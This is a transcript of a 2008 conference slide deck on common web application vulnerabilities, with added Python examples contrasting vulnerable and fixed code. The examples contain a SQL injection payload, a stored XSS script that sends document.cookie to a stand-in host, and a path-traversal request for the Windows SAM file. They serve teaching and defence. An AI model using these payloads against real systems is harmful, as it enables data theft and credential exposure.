ms innovation day: a lap around web application vulnerabilities by mvp walter wong


Upload: quek-lilian

Post on 14-May-2015


DESCRIPTION

A live hacking session demonstrating the tools and techniques attackers use, with an in-depth look at why insecure applications fail and how each vulnerability is fixed.

TRANSCRIPT

Page 1: MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter Wong

Lap Around Web Application Vulnerabilities

Walter Wong
MVP – Visual Developer (Security)
[email protected]
http://spaces.live.com/walterwws

Page 2

Top 10 Web Application Vulnerabilities in 2007

1. Cross-site Scripting (XSS)
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross Site Request Forgery
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access

Source: http://www.owasp.org/index.php/top_10_2007

Page 3

Agenda

•The foundation of attack
•Advanced attack techniques
•Obfuscation
•Automated testing

Page 4

Foundation of attack

•Application attacks are also known as “layer 7 attacks”
•A program is just a set of instructions; it does whatever its input drives it to do
•The developer is the key protector
•All input is evil (Writing Secure Code by Michael Howard and David LeBlanc)

Page 5

3 basic techniques

Path Traversal

Cross-site Scripting

SQL Injection

Page 6

SQL Injection

•The SQL statement is built by string concatenation
•The attacker's input changes the semantics of the SQL query
•Developers prefer string concatenation because it is easy; they know the safer method (parameterised queries) but it requires more thought

Page 7

Scenario #1

The attacker submits specially crafted input when performing a search.
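Scenario #1 as an added example (not code from the deck; the deck's stack is ASP.NET, the mechanism is shown here in Python with SQLite so it runs anywhere). search_vulnerable() builds the statement by concatenation; search_safe() uses a placeholder, the equivalent of the SqlParameter approach the deck recommends. The table, rows and payload are constructed for the demo.

```python
# Added example: SQL injection through a concatenated search query vs a
# parameterised one. Not from the original deck; data is constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory catalogue with one unpublished row the search must never return."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT, price REAL, published INTEGER)")
    con.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [("Widget", 9.99, 1), ("Gadget", 19.99, 1), ("Secret prototype", 0.0, 0)],
    )
    return con


def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    """Concatenation: whatever the user types is parsed as part of the SQL."""
    sql = (
        "SELECT name FROM products WHERE published = 1 "
        "AND name LIKE '%" + term + "%'"
    )
    return [row[0] for row in con.execute(sql)]


def search_safe(con: sqlite3.Connection, term: str) -> list:
    """Placeholder: the driver passes the term as a value. It can only be
    compared against names; it can never change the query's structure.
    (% and _ still act as LIKE wildcards, but that is data, not SQL.)"""
    sql = "SELECT name FROM products WHERE published = 1 AND name LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + term + "%",))]


# A search term that closes the quoted string and appends its own condition.
# Concatenated, the WHERE clause becomes:
#   published = 1 AND name LIKE '%%' OR 1=1 OR name LIKE '%%'
# which is true for every row, including the unpublished one.
PAYLOAD = "%' OR 1=1 OR name LIKE '"

if __name__ == "__main__":
    db = make_db()
    print("normal search      :", search_safe(db, "Wid"))
    print("vulnerable + payload:", search_vulnerable(db, PAYLOAD))
    print("safe + payload      :", search_safe(db, PAYLOAD))
```

The same term reaches both functions; only the vulnerable one returns the unpublished row, because there the term became part of the query text rather than a value bound to it.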

Page 8

SQL Injection

Page 9

Date : 12 June 2008

http://www.lowyat.net

Page 10

3 basic techniques

Path Traversal

Cross-site Scripting

SQL Injection

Page 11

Cross-site Scripting (XSS)

How does it work?
1. Take input from the user
2. Fail to validate the input
3. Echo the input directly into the web page
4. Done!

Page 12

Scenario #2

The developer uses

<%# DataBinder.Eval(Container.DataItem, "Column1") %>

to bind data in a DataList. The column value is written into the page as-is, without HTML encoding.
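Scenario #2 as an added example, not code from the deck and shown in Python rather than ASP.NET. render_unsafe() does what the unencoded DataBinder.Eval binding does, writing the column value straight into the markup; render_safe() HTML-encodes it first, the equivalent of wrapping the Eval in HttpUtility.HtmlEncode. safe_href() covers an attribute case the deck does not go into: encoding alone does not neutralise a javascript: URL. The rows are constructed.

```python
# Added example: stored XSS through an unencoded data binding, and the
# context-specific fixes. Not from the original deck; rows are constructed.
import html
from urllib.parse import urlsplit

# Constructed rows as they might come back from the bound data source.
ROWS = [
    {"Column1": "Nice article!"},
    {"Column1": "<script>document.location='http://evil.test/?c='+document.cookie</script>"},
]


def render_unsafe(rows):
    """Echoes Column1 straight into the page (steps 1-4 of the XSS slide)."""
    return "".join("<li>%s</li>" % row["Column1"] for row in rows)


def render_safe(rows):
    """HTML-encodes Column1 so <, >, &, and quotes become entities, not markup."""
    return "".join(
        "<li>%s</li>" % html.escape(row["Column1"], quote=True) for row in rows
    )


def safe_href(url):
    """Encoding is context-specific: html.escape leaves 'javascript:' intact,
    so a URL-bearing attribute also needs a scheme allow-list."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def has_active_script(markup):
    """Demo check: does the output still contain a raw <script tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_unsafe(ROWS))
    print(render_safe(ROWS))
    print(safe_href("javascript:alert(1)"), safe_href("https://example.test/?a=1&b=2"))
```

Validate Input, Validate Output (VIVO) in the deck's terms: the input filter may miss a payload, so the output encoder is the control that must always run, and it must match the context (element body, attribute, URL) the value lands in.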

Page 13

Cross-Site Scripting (XSS)

Page 14

3 basic techniques

Path Traversal

Cross-site Scripting

SQL Injection

Page 15

Path Traversal

•Access files the application never intended to expose
•In the worst case, read any file on the system the web server account can read
•Uses “dot-dot-slash” (../ or ..\) to back out of the intended folder

Example:http://app.com/GetImage.aspx?file=..\..\windows\repair\sam

Page 16

Scenario #3

To avoid “Resource cannot be found” errors, the developer creates a page that checks whether the picture file exists. If it does not exist, a generic image is shown instead. The existence check says nothing about where the file is.
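Scenario #3 as an added example (not code from the deck, written in Python rather than ASP.NET). serve_naive() is the existence check with a generic-image fallback; it still follows "..\" out of the folder. serve_checked() canonicalises the path and refuses anything that does not resolve inside the image folder. demo() builds a throwaway folder layout to exercise both; the folder and file names, and the generic.png fallback, are assumptions for the demo.

```python
# Added example: path traversal through an exists-or-generic image handler,
# and the canonicalise-then-check fix. Not from the original deck.
import os
import shutil
import tempfile

GENERIC = "generic.png"  # name of the fallback image, an assumption for the demo


def _candidate(base_dir, requested):
    # Treat backslashes as separators too, as the Windows file APIs would.
    rel = requested.replace("\\", "/")
    return os.path.realpath(os.path.join(os.path.realpath(base_dir), rel))


def serve_naive(base_dir, requested):
    """Scenario #3: if the file exists serve it, otherwise the generic image."""
    path = _candidate(base_dir, requested)
    return path if os.path.isfile(path) else os.path.join(base_dir, GENERIC)


def serve_checked(base_dir, requested):
    """Resolve the path, then insist the result is still inside base_dir.
    An absolute path or enough '..' segments resolve elsewhere and are refused."""
    base = os.path.realpath(base_dir)
    path = _candidate(base_dir, requested)
    inside = os.path.commonpath([base, path]) == base
    if not inside or not os.path.isfile(path):
        return os.path.join(base, GENERIC)
    return path


def demo():
    """Layout: <tmp>/images/{logo.png,generic.png} and <tmp>/secret.txt."""
    root = os.path.realpath(tempfile.mkdtemp())
    try:
        images = os.path.join(root, "images")
        os.mkdir(images)
        for name in ("logo.png", GENERIC):
            open(os.path.join(images, name), "w").close()
        secret = os.path.join(root, "secret.txt")
        open(secret, "w").close()
        logo = os.path.join(images, "logo.png")
        generic = os.path.join(images, GENERIC)
        return {
            "naive_serves_logo": serve_naive(images, "logo.png") == logo,
            "naive_follows_dotdot": serve_naive(images, "..\\secret.txt") == secret,
            "checked_serves_logo": serve_checked(images, "logo.png") == logo,
            "checked_blocks_dotdot": serve_checked(images, "..\\secret.txt") == generic,
            "checked_blocks_sam": serve_checked(images, "..\\..\\windows\\repair\\sam") == generic,
            "checked_blocks_absolute": serve_checked(images, "/etc/hostname") == generic,
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for check, result in demo().items():
        print(check, result)
```

The prefix comparison is done on the real, resolved path, so symlinks inside the image folder that point elsewhere are caught as well. A further hardening the deck's slide on defence implies: only accept a file name from the request, never a path, and look it up in an allow-list.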

Page 17

Path Traversal

Page 18

Advanced techniques

•Build on the basic attack techniques
•Able to unveil a lot of private information about the servers
•Examples:

WMI Attack
Hosts File Hijacking

Page 19

WMI Attack

•WMI = Windows Management Instrumentation
•WMI is an essential tool for IT administrators to manage servers and workstations
•Damage:

Retrieve the server's information
Remotely uninstall applications

Page 20

Scenario #4

The attacker retrieves the list of software installed on the web server and uninstalls the software.

Page 21

WMI Attack

Page 22

Hosts File Hijacking

•Windows relies on DNS and the hosts file to resolve a name to its target IP address; the hosts file is consulted first
•Hosts file location: %windir%\system32\drivers\etc\hosts
•Damage:

Corrupt the hosts file so that traffic is redirected to a malicious server

Page 23

Scenario #5

The attacker redirects the traffic for www.abc.com to a different IP address. Imagine an antivirus application being sent to the wrong IP address to download its latest signature file.
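A check for the condition scenario #5 creates, as an added example (not from the deck; Python, not the deck's .NET). It parses hosts-file content and flags two things: any entry for a name the machine must resolve through DNS (the antivirus update host in the slide), and a localhost name mapped off the loopback range. The sample content, PROTECTED names and addresses are constructed for the demo.

```python
# Added example: spotting hosts-file hijacks. Not from the original deck;
# the sample file and the protected names are constructed.
import ipaddress

# Names that must always be resolved by DNS, never pinned in the hosts file.
PROTECTED = {"www.abc.com", "update.example-av.test"}

SAMPLE_HOSTS = """\
# constructed sample of %windir%\\system32\\drivers\\etc\\hosts
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.test build.corp.test
203.0.113.9     www.abc.com
203.0.113.9     update.example-av.test   # signatures now come from here
198.51.100.7    localhost
not-an-ip       junk.test
"""


def parse_hosts(text):
    """Yield (ip_address, [names]) for each valid entry. Comments and blank
    lines are skipped; lines whose address does not parse are ignored."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        yield addr, [name.lower() for name in fields[1:]]


def find_hijacks(text, protected=PROTECTED):
    """Return (name, ip, reason) for every suspicious mapping in the file."""
    findings = []
    for addr, names in parse_hosts(text):
        for name in names:
            if name in protected:
                findings.append((name, str(addr), "protected name pinned in hosts file"))
            elif name == "localhost" and not addr.is_loopback:
                findings.append((name, str(addr), "localhost mapped off loopback"))
    return findings


if __name__ == "__main__":
    for finding in find_hijacks(SAMPLE_HOSTS):
        print(*finding)
```

To run it against the real file on Windows, read the path the slide gives (os.path.expandvars(r"%windir%\system32\drivers\etc\hosts")) and pass the text to find_hijacks(). Writing to that file needs administrator rights, so an unexpected entry is also evidence that something already ran with those rights.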

Page 24

Host File Hijacking

Page 25

Obfuscation

•The default .NET assembly format lets anyone disassemble and decompile it
•Obfuscation rebuilds the .NET assembly into a form that is much harder to disassemble, decompile and understand
•It raises the bar for competitors and attackers trying to recover your source code, but it is not a substitute for keeping secrets out of the assembly

Page 26

Scenario #6

The attacker downloads the .NET assembly through a path traversal attack, then successfully disassembles and decompiles it. The attacker can now read all the logic behind the application.

Page 27

Obfuscator

Page 28

Automated Testing

•Develop your own testing tools
•Automate your testing process
•Visual Studio Tester Edition has the capability to do automated testing

Page 29

The Dark Side……

•Brute-force attacks use the same technique: an automated tool repeating requests
•It is a common way to “try out” passwords
•To prevent such attacks, identify the source:

MAC address
IP address
Login username
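The “identify the source” defence from this slide, as an added example (not from the deck; Python, not the deck's .NET). Failures are counted per client address and per username within a sliding window; the MAC address from the slide is accepted as an optional extra key because a web server only sees it for clients on its own network segment. The attempt log and the thresholds are constructed.

```python
# Added example: throttling brute-force logins by source. Not from the
# original deck; the attempt log is constructed.
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window failure counter per source identifier."""

    def __init__(self, max_per_ip=5, max_per_user=20, window=300):
        # A higher per-user limit than per-IP limit: a tight per-user limit
        # lets an attacker lock the real user out on purpose.
        self.limits = {"ip": max_per_ip, "user": max_per_user, "mac": max_per_ip}
        self.window = window
        self.failures = defaultdict(deque)  # (kind, value) -> failure timestamps

    def _count(self, kind, value, now):
        q = self.failures[(kind, value)]
        while q and q[0] <= now - self.window:
            q.popleft()
        return len(q)

    def keys(self, ip, user, mac=None):
        keys = [("ip", ip), ("user", user.lower())]
        if mac:  # only meaningful when the client is on the local segment
            keys.append(("mac", mac.lower()))
        return keys

    def allowed(self, now, ip, user, mac=None):
        return all(self._count(k, v, now) < self.limits[k]
                   for k, v in self.keys(ip, user, mac))

    def record_failure(self, now, ip, user, mac=None):
        for k, v in self.keys(ip, user, mac):
            self.failures[(k, v)].append(now)


# (seconds, client ip, username, password correct?)  -- constructed
ATTEMPTS = [
    (0, "198.51.100.7", "admin", False),
    (1, "198.51.100.7", "admin", False),
    (2, "198.51.100.7", "admin", False),
    (3, "198.51.100.7", "admin", False),
    (4, "198.51.100.7", "admin", False),
    (5, "198.51.100.7", "admin", True),   # guessed right, but the source is already blocked
    (6, "198.51.100.7", "admin", False),
    (10, "192.0.2.10", "admin", True),    # the real admin, from another address
]


def replay(attempts, throttle=None):
    """Run attempts through the throttle; returns one outcome per attempt."""
    throttle = throttle or LoginThrottle()
    outcomes = []
    for now, ip, user, ok in attempts:
        if not throttle.allowed(now, ip, user):
            outcomes.append("blocked")
        elif ok:
            outcomes.append("ok")
        else:
            throttle.record_failure(now, ip, user)
            outcomes.append("failed")
    return outcomes


if __name__ == "__main__":
    for attempt, outcome in zip(ATTEMPTS, replay(ATTEMPTS)):
        print(attempt, "->", outcome)
```

Keying on the address stops the single-source tool in scenario #7; an attacker spreading attempts over many addresses is only caught by the per-username count, which is why both keys are tracked. The attempt at second 5 shows the point of the throttle: the password was right, but the source had already used up its failures.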

Page 30

Scenario #7

Develop a simple application to automate a brute-force attack on a wireless router.

Page 31

Automate the task

Page 32

Steps to Defend Against Attackers

•Validate input on both the client side and the server side
•Duplicate the validation functions on both sides; the client-side copy is for usability, the server-side copy is the one an attacker cannot bypass
•NO SQL injection – use parameterised queries (the Parameter classes in .NET)
•NO XSS – Validate Input, Validate Output (VIVO)
•Obfuscate your code TODAY!
•Be innovative and creative in testing

Page 34

Resources

Visit my blog at http://spaces.live.com/walterwws

Page 35

Resources

Visit my Pagecast at http://www.pageflakes.com/walterw

Page 36

© 2008 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries. The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.